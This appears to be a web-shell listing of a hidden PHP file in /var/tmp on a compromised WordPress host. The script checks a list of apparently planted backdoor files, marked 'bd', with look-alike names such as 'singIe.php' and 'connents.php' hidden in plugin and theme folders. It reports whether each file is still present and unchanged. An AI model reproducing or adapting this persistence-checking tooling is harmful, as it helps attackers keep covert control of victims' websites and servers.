| Current Path : /var/tmp/ |
| Current File : //var/tmp/.center |
<?php $r = '/home/dh_x9rshq/rachelblanchardwriter.com'; $x = ["/wp-content/plugins/wordpress-seo/src/dashboard/domain/endpoint/endpoint.list.php"=>"bd@@46095@@468",
"/d1c8e8.php"=>"bd@@17686@@105",
"/wp-content/plugins/wordpress-seo/src/editors/domain/seo/seo.php"=>"bd@@46391@@467",
"/wp-content/plugins/widget_1751122033/wp-config.php"=>"bd@@430142@@727",
"/74031a.php"=>"bd@@104521@@105",
"/wp-content/plugins/wordpress-seo/src/actions/indexing/indexing.indexing.indexation.action.php"=>"bd@@46700@@466",
"/wp-content/plugins/backup_1748028558/singIe.php"=>"bd@@265341@@727",
"/wp-content/themes/Divi/includes/builder/tests/codeception/wpunit/cycle_image.php"=>"bd@@45949@@422",
"/wp-content/themes/Divi/includes/builder/module/field/template/border/editquestions.php"=>"bd@@338350@@427",
"/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/fortress.php"=>"bd@@338352@@436",
"/wp-content/themes/category_template_1748020282/styIe.php"=>"bd@@257725@@727",
"/wp-content/themes/author-template-1747923404/singIe.php"=>"bd@@230105@@731",
"/wp-content/themes/custom_functions_1747416891/connents.php"=>"bd@@2089@@1166"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');